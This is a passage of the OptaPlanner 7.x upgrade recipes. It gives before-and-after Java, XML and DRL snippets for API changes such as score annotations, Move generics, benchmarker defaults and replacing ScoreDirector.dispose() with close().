<scoreDrl>org\/optaplanner\/examples\/projectjobscheduling\/solver\/projectJobSchedulingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nBefore in `*.java`:\n[source, java]\n----\n @PlanningScore\n private BendableScore score;\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @PlanningScore(bendableHardLevelsSize = 1, bendableSoftLevelsSize = 2)\n private BendableScore score;\n----\n\nIn the rare case that you're using a custom score, also move its declaration into the domain:\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDefinitionClass>...MyCustomScoreDefinition<\/scoreDefinitionClass>\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @PlanningScore(scoreDefinitionClass = MyCustomScoreDefinition.class)\n----\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `@PlanningVariable` on primitive types: no longer supported\n\nA `@PlanningVariable` annotation on a primitive type such as `int` or `long` (instead of `Integer` or `Long`)\nnow fails fast instead of causing an inferior result.\nThe use of a primitive type caused the Construction Heuristics to presume the variable is already initialized\n(because it's not null and it might be form of Repeated Planning),\nwhich lead to inferior results.\nIt was hard to diagnose the cause of that issue for many users, so now this inferior approach fails fast with a clear message.\n\nBefore in `*.java`:\n[source, java]\n----\n private int delay;\n\n @PlanningVariable(valueRangeProviderRefs = {\"delayRange\"})\n public int getDelay() {\n return delay;\n }\n\n public void setDelay(int delay) {\n this.delay = delay;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n private Integer delay;\n\n @PlanningVariable(valueRangeProviderRefs = {\"delayRange\"})\n public Integer getDelay() {\n return delay;\n }\n\n public void setDelay(Integer delay) {\n this.delay = delay;\n }\n----\n\n\n[.upgrade-recipe-minor]\n=== `VariableListener` events are no longer unique\n\nOptaPlanner might call the `before...` and `after...` methods on your `VariableListener` implementation\ntwice with the exact same parameters.\nMost `VariableListener` implementations can deal with this,\ngetting a small performance boost because OptaPlanner doesn't have to guarantee uniqueness.\nIf your implementation can't deal with it, then overwrite the `requiresUniqueEntityEvents()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class StartTimeUpdatingVariableListener implements VariableListener<Task> {\n\n ...\n}\n----\n\nAfter in `*.java` (optional):\n[source, java]\n----\npublic class StartTimeUpdatingVariableListener implements VariableListener<Task> {\n\n @Override\n public boolean requiresUniqueEntityEvents() {\n \/\/ If you don't need to overwrite this method, you get a small performance gain\n return true;\n }\n\n ...\n}\n----\n\n\n[.upgrade-recipe-recommended]\n=== Faster and nicer `accumulate()` in `drl`\n\nDrools now uses typed `sum()`, `min()`, `max()` and `avg()` functions in `accumulate()` patterns.\nThis means that a sum of ints is now an int (instead of a double) and a sum of BigDecimals is now a BigDecimal (without rounding errors).\nThis is faster and it also gets rid of the `intValue()` conversions.\n\nMeanwhile, also take advantage of migrating to the clearer `accumulate` form, if you haven't already.\n\nBefore in `*.drl`:\n[source, drl]\n----\nrule \"requiredCpuPowerTotal\"\n when\n $c : CloudComputer($capacity : cpuPower)\n $total : Number(intValue > $capacity) from accumulate(\n CloudProcess(\n computer == $c,\n $required : requiredCpuPower),\n sum($required)\n )\n then\n scoreHolder.addHardConstraintMatch(kcontext, $capacity - $total.intValue());\nend\n----\n\nAfter in `*.drl`:\n[source, drl]\n----\nrule \"requiredCpuPowerTotal\"\n when\n $c : CloudComputer($capacity : cpuPower)\n accumulate(\n CloudProcess(\n computer == $c,\n $required : requiredCpuPower);\n $total : sum($required);\n $total > $capacity\n )\n then\n scoreHolder.addHardConstraintMatch(kcontext, $capacity - $total);\nend\n----\n\nNotice that the pattern, the function list and the DRL constraint list in the `accumulate()`\nare recommended to be separated by a `;` character instead of a `,` character.\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: implement `isCompatibleArithmeticArgument()`\n\nAn `AbstractScore` no longer implements the `Score` interface method `isCompatibleArithmeticArgument()` (which is still there).\nNow, your custom `Score` implementation needs to implement it itself.\n\nThis way, `Score` instances can be reused by GWT and other JavaScript generating code.\n\nBefore in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> {\n ...\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> {\n ...\n\n @Override\n public boolean isCompatibleArithmeticArgument(Score otherScore) {\n return otherScore instanceof HardSoftScore;\n }\n\n}\n----\n\n\n== From 7.0.0.Beta2 to 7.0.0.Beta3\n\n[.upgrade-recipe-minor]\n=== `Solver.getScoreDirectorFactory`: call `ScoreDirector.dispose()`\n\nEvery `ScoreDirector` needs to be disposed to avoid a potential memory leak.\nThe old docs didn't clearly mention that, so your code might not do that.\n\nBefore in `*.java`:\n[source, java]\n----\nScoreDirectorFactory<CloudBalance> scoreDirectorFactory = solver.getScoreDirectorFactory();\nScoreDirector<CloudBalance> guiScoreDirector = scoreDirectorFactory.buildScoreDirector();\n...\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScoreDirectorFactory<CloudBalance> scoreDirectorFactory = solver.getScoreDirectorFactory();\nScoreDirector<CloudBalance> guiScoreDirector = scoreDirectorFactory.buildScoreDirector();\n...\nguiScoreDirector.dispose();\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom cloning: `PlanningCloneable` replaced\n\nThe interface `PlanningCloneable` has been removed,\nuse a `SolutionCloner` instead.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class NQueens implements PlanningCloneable<NQueens> {\n ...\n\n public NQueens planningClone() {\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class NQueensSolutionCloner implements SolutionCloner<NQueens> {\n\n @Override\n public NQueens cloneSolution(CloneLedger ledger, NQueens original) {\n ...\n }\n\n}\n----\n\n[source, java]\n----\n@PlanningSolution(solutionCloner = NQueensSolutionCloner.class)\npublic class NQueens {\n ...\n}\n----\n\n\n== From 7.0.0.Beta3 to 7.0.0.Beta4\n\n[.upgrade-recipe-recommended]\n=== Add `@PlanningId` annotation\n\nIt is recommended to add a `@PlanningId` annotation\non the unique ID of every planning entity and on most problem fact classes\n(especially on each class that is a planning value class).\nThe ID must never be null and must be unique per class (no need to be globally unique).\n\nThis enables the use of multithreaded solvers (such as Partitioned Search)\nand makes it easier to implement a real-time planning `ProblemFactChange` by using `ScoreDirector.lookUpWorkingObject()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic abstract class AbstractPersistable ... {\n\n protected Long id; \/\/ Can also be a String, Integer, ...\n\n public Long getId() {\n return id;\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic abstract class AbstractPersistable ... {\n\n protected Long id; \/\/ Can also be a String, Integer, ...\n\n @PlanningId\n public Long getId() {\n return id;\n }\n\n ...\n}\n----\n\nYou can also put the `@PlanningId` annotation on the field instead.\n\n\n[.upgrade-recipe-minor]\n=== `ProblemFactChange`: Use `lookUpWorkingObject()`\n\nUse the new method `ScoreDirector.lookUpWorkingObject(Object)` to translate a planning entity or problem fact\nto its working instance planning clone more efficiently.\n\nThis requires that the class has a `@PlanningId` annotation on one of its getters or fields.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class EditComputerProblemFactChange implements ProblemFactChange<CloudBalance> {\n\n private final CloudComputer changedComputer;\n ...\n\n public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n CloudComputer workingComputer = null;\n for (CloudComputer computer : cloudBalance.getComputerList()) {\n if (changedComputer.getId().equals(computer.getId())) {\n workingComputer = computer;\n break;\n }\n }\n\n scoreDirector.beforeProblemPropertyChanged(workingComputer);\n workingComputer.setCpuPower(changedComputer.getCpuPower());\n scoreDirector.afterProblemPropertyChanged(workingComputer);\n ...\n scoreDirector.triggerVariableListeners();\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class EditComputerProblemFactChange implements ProblemFactChange<CloudBalance> {\n\n private final CloudComputer changedComputer;\n ...\n\n public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n CloudComputer workingComputer = scoreDirector.lookUpWorkingObject(changedComputer);\n\n scoreDirector.beforeProblemPropertyChanged(workingComputer);\n workingComputer.setCpuPower(changedComputer.getCpuPower());\n scoreDirector.afterProblemPropertyChanged(workingComputer);\n ...\n scoreDirector.triggerVariableListeners();\n }\n\n}\n----\n\n\n== From 7.0.0.Beta5 to 7.0.0.Beta6\n\n[.upgrade-recipe-minor]\n=== Benchmarker warms up by default\n\nIt is no longer needed to explicitly configure a warm up time for the benchmarks.\nIt now warms up for 30 seconds by default.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<plannerBenchmark>\n ...\n <warmUpSecondsSpentLimit>30<\/warmUpSecondsSpentLimit>\n ...\n<\/plannerBenchmark>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<plannerBenchmark>\n ...\n<\/plannerBenchmark>\n----\n\nTo disable the warm up, explicitly set it to 0:\n[source, xml]\n----\n<plannerBenchmark>\n ...\n <warmUpSecondsSpentLimit>0<\/warmUpSecondsSpentLimit>\n ...\n<\/plannerBenchmark>\n----\n\n\n[.upgrade-recipe-minor]\n=== `CustomPhaseCommand`: method `applyCustomProperties()` replaced\n\nThe `CustomPhaseCommand` no longer has the method `applyCustomProperties()`.\nIf you have custom properties in your solver configuration,\nsimply implement a public setter for each custom property.\nThe supported types for a setter currently include booleans, numbers and string.\n\nSimilar custom properties support is available on some other custom classes (such as `SolutionPartitioner`).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class MyCustomPhaseCommand extends AbstractCustomPhaseCommand {\n\n private int mySelectionSize;\n\n @Override\n public void applyCustomProperties(Map<String, String> customPropertyMap) {\n String mySelectionSizeString = customPropertyMap.get(\"mySelectionSize\");\n try {\n mySelectionSize = mySelectionSizeString == null ? 10 : Integer.parseInt(mySelectionSizeString);\n } catch (NumberFormatException e) {\n throw new IllegalArgumentException(\"The mySelectionSize (\" + mySelectionSizeString + \") cannot be parsed.\", e);\n }\n ...\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class MyCustomPhaseCommand extends AbstractCustomPhaseCommand {\n\n private int mySelectionSize = 10;\n\n @SuppressWarnings(\"unused\")\n public void setMySelectionSize(int mySelectionSize) {\n this.mySelectionSize = mySelectionSize;\n }\n\n ...\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Bendable*Score`: method `isFeasible()` fixed\n\nA bendable score with at least 2 hard score levels is now infeasible\nif any of those hard levels is negative, even if one of them is positive (1 or higher).\n\n\n[.upgrade-recipe-minor]\n=== `EasyScoreCalculator`: `calculateScore()` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance, int initScore) {\n ...\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance) {\n ...\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\nOptaPlanner still keeps track of the `initScore` internally.\n\n\n[.upgrade-recipe-minor]\n=== `IncrementalScoreCalculator`: `calculateScore()` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(int initScore) {\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore() {\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Score`: `valueOf(...)` and `valueOfInitialized(...)` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOfInitialized(1234);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOf(1234);\n----\n\nOr with a `HardSoftScore`:\n\nBefore in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOfInitialized(1200, 34);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOf(1200, 34);\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom initializer: `Score.compareTo()` behaviour reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOfInitialized(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.toInitializedScore().compareTo(bestScore.toInitializedScore()) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOf(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.compareTo(bestScore) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `Move`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation,\n`Move` and `AbstractMove` now optionally support a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMove extends AbstractMove {\n\n @Override\n public boolean isMoveDoable(ScoreDirector scoreDirector) {\n return !Objects.equals(cloudProcess.getComputer(), toCloudComputer);\n }\n\n @Override\n public Move createUndoMove(ScoreDirector scoreDirector) {\n return new CloudComputerChangeMove(cloudProcess, cloudProcess.getComputer());\n }\n\n @Override\n protected void doMoveOnGenuineVariables(ScoreDirector scoreDirector) {\n scoreDirector.beforeVariableChanged(cloudProcess, \"computer\");\n cloudProcess.setComputer(toCloudComputer);\n scoreDirector.afterVariableChanged(cloudProcess, \"computer\");\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMove extends AbstractMove<CloudBalance> {\n\n @Override\n public boolean isMoveDoable(ScoreDirector<CloudBalance> scoreDirector) {\n return !Objects.equals(cloudProcess.getComputer(), toCloudComputer);\n }\n\n @Override\n public CloudComputerChangeMove createUndoMove(ScoreDirector<CloudBalance> scoreDirector) {\n return new CloudComputerChangeMove(cloudProcess, cloudProcess.getComputer());\n }\n\n @Override\n protected void doMoveOnGenuineVariables(ScoreDirector<CloudBalance> scoreDirector) {\n scoreDirector.beforeVariableChanged(cloudProcess, \"computer\");\n cloudProcess.setComputer(toCloudComputer);\n scoreDirector.afterVariableChanged(cloudProcess, \"computer\");\n }\n\n ...\n}\n----\n\n\n== From 7.0.0.Beta6 to 7.0.0.Beta7\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== `ConstraintMatch(Total)`: `getWeightTotal()` and `getWeight()` replaced\n\nWhen explaining a score through `ScoreDirector.getConstraintMatchTotals()`,\nthe `ConstraintMatchTotal` and `ConstraintMatch` instances now have a `Score`\ninstead of an `int scoreLevel` and a `Number weight`.\n\nThis simplifies the API and allows the reuse of `ConstraintMatch` in the indictment API.\n\nBefore in `*.java`:\n[source, java]\n----\n for (ConstraintMatchTotal constraintMatchTotal : guiScoreDirector.getConstraintMatchTotals()) {\n int scoreLevel = constraintMatchTotal.getScoreLevel();\n Integer weightTotal = (Integer) constraintMatchTotal.getWeightTotalAsNumber();\n String text = weightTotal.toString() + (scoreLevel == 0 ? \"hard\" : \"soft\");\n ...\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n for (ConstraintMatchTotal constraintMatchTotal : guiScoreDirector.getConstraintMatchTotals()) {\n HardSoftScore scoreTotal = (HardSoftScore) constraintMatchTotal.getScoreTotal();\n String text = scoreTotal.toShortString();\n ...\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `getConstraintMatchTotals()` impact\n\nWhen implementing the interface `ConstraintMatchAwareIncrementalScoreCalculator`'s method `getConstraintMatchTotals()`,\nthe constructor of `ConstraintMatchTotal` and the method `addConstraintMatch(...)`\nnow use `Score` instances instead of numbers.\n\nBefore in `*.java`:\n[source, java]\n----\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n LongConstraintMatchTotal maximumCapacityMatchTotal = new LongConstraintMatchTotal(\n CONSTRAINT_PACKAGE, \"maximumCapacity\", 0);\n ...\n serviceLocationSpreadMatchTotal.addConstraintMatch(\n ..., - weight);\n ...\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ConstraintMatchTotal maximumCapacityMatchTotal = new ConstraintMatchTotal(\n CONSTRAINT_PACKAGE, \"maximumCapacity\", HardSoftLongScore.ZERO);\n ...\n serviceLocationSpreadMatchTotal.addConstraintMatch(\n ..., HardSoftLongScore.valueOf(- weight, 0));\n ...\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== Score rule that changes 2 score levels: call `addMultiConstraintMatch()`\n\nA score rule that changes 2 score levels in its RHS,\nmust now call `addMultiConstraintMatch()` instead of 2 separate `add*ConstraintMatch()` calls.\n\nBefore in `*.drl`:\n[source, drl]\n----\nrule \"Costly and unfair\"\nwhen\n \/\/ Complex pattern\nthen\n scoreHolder.addMediumConstraintMatch(kcontext, -3); \/\/ Financial cost\n scoreHolder.addSoftConstraintMatch(kcontext, -4); \/\/ Employee happiness cost\nend\n----\n\nAfter in `*.drl`:\n[source, drl]\n----\nrule \"Costly and unfair\"\nwhen\n \/\/ Complex pattern\nthen\n scoreHolder.addMultiConstraintMatch(kcontext, 0, -3, -4);\nend\n----\n\nWhen calling `guiScoreDirector.getConstraintMatchTotals()`,\nthere is now also only one `ConstraintMatchTotal` instance for this score rule\nand only one `ConstraintMatch` instance per fired rule.\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: `toShortString()` added\n\nIf you have a custom `ScoreDefinition`: the `Score` interface has another new method `toShortString()`.\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n @Override\n public String toShortString() {\n return buildShortString((n) -> ((Integer) n).intValue() != 0, HARD_LABEL, SOFT_LABEL);\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Move`: `createUndoMove()` and `doMove()` changed\n\nThe `Move` interface has changed: `doMove()` now returns the undo move, so `createUndoMove()` has been removed.\nThis was needed to fix a bug in `CompositeMove`.\nHowever, `AbstractMove` completely deals with this change, so *your custom move implementation stays the same*.\n\nIn the very rare case that you're actually calling `createUndoMove()` yourself,\nuse the return type of `doMove()` instead.\n\nBefore in `*.java`:\n[source, java]\n----\n Move<Solution_> move = ...;\n Move<Solution_> undoMove = move.createUndoMove(scoreDirector);\n move.doMove(scoreDirector);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n Move<Solution_> move = ...;\n Move<Solution_> undoMove = move.doMove(scoreDirector);\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `ScoreDefinition`: `getZeroScore()` added\n\nIf you have a custom `ScoreDefinition`: the `ScoreDefinition` interface has another new method `getZeroScore()`.\n\nAfter in `*.java`:\n[source, java]\n----\npublic class HardSoftScoreDefinition extends AbstractFeasibilityScoreDefinition<HardSoftScore> {\n ...\n\n @Override\n public HardSoftScore getZeroScore() {\n return HardSoftScore.ZERO;\n }\n}\n----\n\n\n== From 7.0.0.Beta7 to 7.0.0.CR1\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `getIndictmentMap()` added\n\nIf you're using a Java incremental score calculator that is also `ConstraintMatch` aware,\nit now needs to also implement the method `getIndictmentMap()`.\nSimply `return null` to have it calculated automatically from the return value of `getConstraintMatchTotals()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class MachineReassignmentIncrementalScoreCalculator\n implements ConstraintMatchAwareIncrementalScoreCalculator<MachineReassignment> {\n\n ...\n\n @Override\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ...\n }\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class MachineReassignmentIncrementalScoreCalculator\n implements ConstraintMatchAwareIncrementalScoreCalculator<MachineReassignment> {\n\n ...\n\n @Override\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ...\n }\n\n @Override\n public Map<Object, Indictment> getIndictmentMap() {\n return null; \/\/ Calculate it non-incrementally from getConstraintMatchTotals()\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `MoveListFactory` and `MoveIteratorFactory`: method return `Move<Solution_>`\n\nThe `MoveListFactory` and `MoveIteratorFactory`'s methods now use `Move<Solution_>` instead of a raw-typed `Move`.\nThis way your `MoveListFactory` can return `List<ChangeMove<MySolution>>` instead of `List<ChangeMove>`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<Move> createMoveList(CloudBalance solution) {\n ...\n }\n\n}\n----\n\nAfter in `*.java` (if it creates generic `ChangeMove` instances):\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<ChangeMove<CloudBalance>> createMoveList(CloudBalance nQueens) {\n ...\n }\n\n}\n----\n\nAfter in `*.java` (if it creates `CloudComputerChangeMove` instances and that implements `Move<CloudBalance>`):\n\n[source, java]\n----\npublic class RowChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<CloudComputerChangeMove> createMoveList(CloudBalance nQueens) {\n ...\n }\n\n}\n----\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CheapTimePillarSlideMoveIteratorFactory implements MoveIteratorFactory<CheapTimeSolution> {\n\n public Iterator<Move> createOriginalMoveIterator(...) {...}\n public Iterator<Move> createRandomMoveIterator(...) {...}\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CheapTimePillarSlideMoveIteratorFactory implements MoveIteratorFactory<CheapTimeSolution> {\n\n public Iterator<CheapTimePillarSlideMove> createOriginalMoveIterator(...) {...}\n public Iterator<CheapTimePillarSlideMove> createRandomMoveIterator(...) {...}\n\n}\n----\n\n\n== From 7.0.0.CR3 to 7.0.0.Final\n\n[.upgrade-recipe-impl-detail]\n=== Workbench's `AbstractSolution` deprecated\n\nThe implementation class `AbstractSolution`, used only by workbench 6,\nhas been deprecated and replaced by the `autoDiscoverMemberType` feature.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class Mysolution extends AbstractSolution<HardSoftScore> {\n\n private List<FooFact> fooFactList;\n private List<BarFact> barFactList;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution(autoDiscoverMemberType = AutoDiscoverMemberType.FIELD)\npublic class Mysolution {\n\n private List<FooFact> fooFactList;\n private List<BarFact> barFactList;\n\n private HardSoftScore score;\n\n ...\n}\n----\n\n\n== From 7.1.0.Beta2 to 7.1.0.Beta3\n\n[.upgrade-recipe-minor]\n=== `<valueSelector>`: `variableName` is now an attribute\n\nWhen power tweaking move selectors, such as `<changeMoveSelector>`,\nin a use case with multiple planning variables,\nthe `<variableName>` XML element has been replaced by a `variableName=\"...\"` XML attribute.\nThis reduces the solver configuration verbosity.\nFor backwards compatibility, the old way is still supported in the 7.x series.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <valueSelector>\n <variableName>room<\/variableName>\n <\/valueSelector>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <valueSelector variableName=\"room\"\/>\n----\n\n[.upgrade-recipe-minor]\n=== Construction Heuristic: multiple variable power tweaking simplified\n\nIt's now easier to configure construction heuristics that scale better for multiple variables,\nbut assigning one variable at a time.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <constructionHeuristic>\n <queuedEntityPlacer>\n <entitySelector id=\"placerEntitySelector\"\/>\n <changeMoveSelector>\n <entitySelector mimicSelectorRef=\"placerEntitySelector\"\/>\n <valueSelector variableName=\"period\"\/>\n <\/changeMoveSelector>\n <changeMoveSelector>\n <entitySelector mimicSelectorRef=\"placerEntitySelector\"\/>\n <valueSelector variableName=\"room\"\/>\n <\/changeMoveSelector>\n <\/queuedEntityPlacer>\n <\/constructionHeuristic>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <constructionHeuristic>\n <constructionHeuristicType>FIRST_FIT<\/constructionHeuristicType>\n <changeMoveSelector>\n <valueSelector variableName=\"period\"\/>\n <\/changeMoveSelector>\n <changeMoveSelector>\n <valueSelector variableName=\"room\"\/>\n <\/changeMoveSelector>\n <\/constructionHeuristic>\n----\n\n\n== From 7.1.0.Final to 7.2.0.Final\n\nThere is no impact on your code.\n\n\n== From 7.2.0.Final to 7.3.0.Final\n\n[.upgrade-recipe-minor]\n=== `SolutionFileIO`: `getOutputFileExtension()` is now defaulted\n\nIt's no longer needed to implement `getOutputFileExtension()` of the `SolutionFileIO` interface\nif it returns the same as `getInputFileExtension()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class VehicleRoutingFileIO implements SolutionFileIO<VehicleRoutingSolution> {\n\n @Override\n public String getInputFileExtension() {\n return \"vrp\";\n }\n\n @Override\n public String getOutputFileExtension() {\n return \"vrp\";\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class VehicleRoutingFileIO implements SolutionFileIO<VehicleRoutingSolution> {\n\n @Override\n public String getInputFileExtension() {\n return \"vrp\";\n }\n\n ...\n}\n----\n\n[.upgrade-recipe-minor]\n=== Benchmarker: direct POJO input\n\nThe benchmarker now also accepts problem instances directly, without reading them from disk.\nIf you're generating your problems or fetching them from a database,\nit might be interesting to switch to this approach (otherwise stick with the old approach because it works offline).\n\nBefore in `*.java`:\n[source, java]\n----\n CloudBalance problem1 = readFromDatabase(...);\n CloudBalance problem2 = readFromDatabase(...);\n ...\n CloudBalanceFileIO solutionFileIO = new CloudBalanceFileIO();\n solutionFileIO.write(problem1, new File(\"tmp\/problem1.xml\"));\n solutionFileIO.write(problem2, new File(\"tmp\/problem1.xml\"));\n ...\n PlannerBenchmark plannerBenchmark = benchmarkFactory.buildPlannerBenchmark();\n plannerBenchmark.benchmark();\n----\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n <solutionFileIOClass>...CloudBalanceFileIO<\/solutionFileIOClass>\n <inputSolutionFile>tmp\/problem1.xml<\/inputSolutionFile>\n <inputSolutionFile>tmp\/problem2.xml<\/inputSolutionFile>\n ...\n <\/problemBenchmarks>\n----\n\nAfter in `*.java`:\n[source, java]\n----\n CloudBalance problem1 = readFromDatabase(...);\n CloudBalance problem2 = readFromDatabase(...);\n ...\n PlannerBenchmark plannerBenchmark = benchmarkFactory.buildPlannerBenchmark(problem1, problem2, ...);\n plannerBenchmark.benchmark();\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n <\/problemBenchmarks>\n----\n\n[.upgrade-recipe-minor]\n=== Benchmarker: `BEST_SCORE` statistic by default\n\nThe benchmarker now includes the `BEST_SCORE` statistic by default.\nIt no longer needs to be explicitly configured.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <problemStatisticType>BEST_SCORE<\/problemStatisticType>\n <\/problemBenchmarks>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <\/problemBenchmarks>\n----\n\nTo disable the `BEST_SCORE` statistic, use `<problemStatisticEnabled>` in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <problemStatisticEnabled>false<\/problemStatisticEnabled>\n <\/problemBenchmarks>\n----\n\n[.upgrade-recipe-major]\n=== `ScoreDirector`: `dispose()` replaced by `close()`\n\n`ScoreDirector` now implements `AutoCloseable`,\nso the `dispose()` method has been deprecated and replaced by `close()`.\n\nBefore in `*.java`:\n[source, java]\n----\n ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector();\n ...\n scoreDirector.dispose();\n----\n\nAfter in `*.java`:\n[source, java]\n----\n ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector();\n ...\n scoreDirector.close();\n----\n\nAfter in `*.java` (with ARM usage):\n[source, java]\n----\n try 